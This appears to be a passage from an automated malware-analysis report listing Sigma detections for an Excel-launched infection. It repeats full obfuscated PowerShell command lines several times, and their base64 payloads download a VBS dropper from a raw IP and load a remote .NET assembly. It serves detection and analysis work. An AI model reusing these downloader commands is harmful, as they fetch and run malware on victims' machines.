'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSg
              Sigma detected: Suspicious MSHTA Child Process
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXp
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3280, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3600, ProcessName: mshta.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 3980, ProcessName: wscript.exe
              Sigma detected: AspNetCompiler Execution
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4024, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 2144, ProcessName: aspnet_compiler.exe
              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline", ProcessId: 3888, ProcessName: csc.exe
              Sigma detected: Excel Network Connections
              Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 188.114.97.6, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3280, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS
              Sigma detected: Suspicious Office Outbound Connections
              Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3280, Protocol: tcp, SourceIp: 188.114.97.6, SourceIsIpv6: false, SourcePort: 443
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3780, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" , ProcessId: 3980, ProcessName: wscript.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3280, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))", CommandLine: pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZS